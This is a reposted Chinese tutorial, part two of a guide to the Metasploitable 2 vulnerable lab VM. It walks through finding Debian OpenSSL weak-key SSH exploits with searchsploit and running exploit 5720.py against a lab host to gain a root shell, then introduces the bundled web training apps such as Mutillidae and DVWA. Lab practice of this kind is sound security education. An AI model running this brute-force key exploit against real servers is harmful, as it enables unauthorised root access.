网站建设行业文章4
当前位置: 首页 -> 企业资讯 -> 行业文章 -> Metasploitable 2 漏洞演练系统使用指南(下)
鸿大千秋新闻顶部侧栏



Metasploitable 2 漏洞演练系统使用指南(下)



 

对metasploitable的一次真实的渗透

发现主机开启ssh,先搜搜exploit-db.
root@bt:/pentest/exploits/exploitdb# ./searchsploit openssl
Description                   Path
————————————————————————— ————————-

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit                      /multiple/remote/5622.txt
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)               /multiple/remote/5632.rb
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)             /linux/remote/5720.py
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit                   /multiple/dos/8873.c
OpenSSL ASN1 BIO Memory Corruption Vulnerability                            /multiple/dos/18756.txt

挑一个python的exp(5720.pl),打开瞧瞧,就会发现贴心的用法

 

好吧开干

  • 下载私钥

 

  •  解压之

 

 

  • 运行exploit尝试私钥登录

 

help:

-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
./exploit.py <dir> <host> <user> [[port] [threads]]
<dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash
<host>: The victim host
<user>: The user of the victim host
[port]: The SSH port of the victim host (default 22)
[threads]: Number of threads (default 4) Too big numer is bad

 

  • root@bt:~/Desktop# python 5720.py ~/Desktop/rsa/2048/ 192.168.1.103 root

fuck1
等到花儿谢了之后,发现成功了

赶紧试一试.

Last login: Thu Jun 21 21:06:33 2012 from 192.168.1.100
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have new mail.

uid=0(root) gid=0(root) groups=0(root)

 

fuck2
我勒个去,真登录进去了,这尼玛太也容易了.

 

 

 搭载Web漏洞演练系统

 

Metasploitable已经帮你提前安装了Web漏洞演练系统,当你打开Metasploitable并接入网络后,Web服务器就会自动开启。此时你只需打开浏览器,输入Metasploitable主机的IP地址,如果打开如下图所示,则说明你打开的姿势没错啦~~~~ ̄ε  ̄

metasploitable-web-home-page

点击主页上的连接,你就可以进入到各个不同的Web漏洞演练系统啦。Metasploitable上配置的Web漏洞演练系统有如下几个:

  • mutillidae (NOWASP Mutillidae 2.1.19)
  • dvwa (Damn Vulnerable Web Application)
  • tikiwiki (TWiki)
  • dav (WebDav)

Mutillidae

Maeutillid这个漏洞演练系统是专门为OWASP Top Ten服务的,针对OWASP提出的10个常见的Web漏洞,Mutillidae对每一个漏洞都制作了题集,类似于DVWA。不仅有OWASP的十大Web漏洞,Mutillidae还包括了像HTML-5 web存储、表单缓存、点击劫持等新兴的漏洞。由于被DVWA的灵感所触发,Mutillidae也允许用户自行调节难度,但不是DVWA的“高中低”难度哦~~是从0(完全没有防御)到5(无懈可击)5个等级呢~~而且还能设置是否提供暗示,哎呦不错哦~太人性化了呀(= ̄ω ̄=)

mutillidae-home-page

如果这个系统被你玩坏鸟,别急别急,点击“Reset D”按钮,Mutillidae就会马上满血满蓝复活~~~(客官,快用力,玩坏我吧~~ ~( ̄▽ ̄)~)

相关文章链接《Metasploitable 2 漏洞演练系统使用指南(上)

小贴士:你可以在YouTube 的webpwnized频道收看到关于Mutillidae的教程视频哦。(小白:“报告大王,这尼玛打不开啊”“啪啪啪,尼玛翻墙去啊啊啊”“( ̄ε(# ̄)是的大王,好的大王~~~”)

视频连接地址:http://www.youtube.com/user/webpwnized

本文由网络安全攻防研究室(www.91ri.org原创,转载请注明出处。

http://www.91ri.org/6138.html



鸿大千秋网站建设团队敬上







Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有


联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号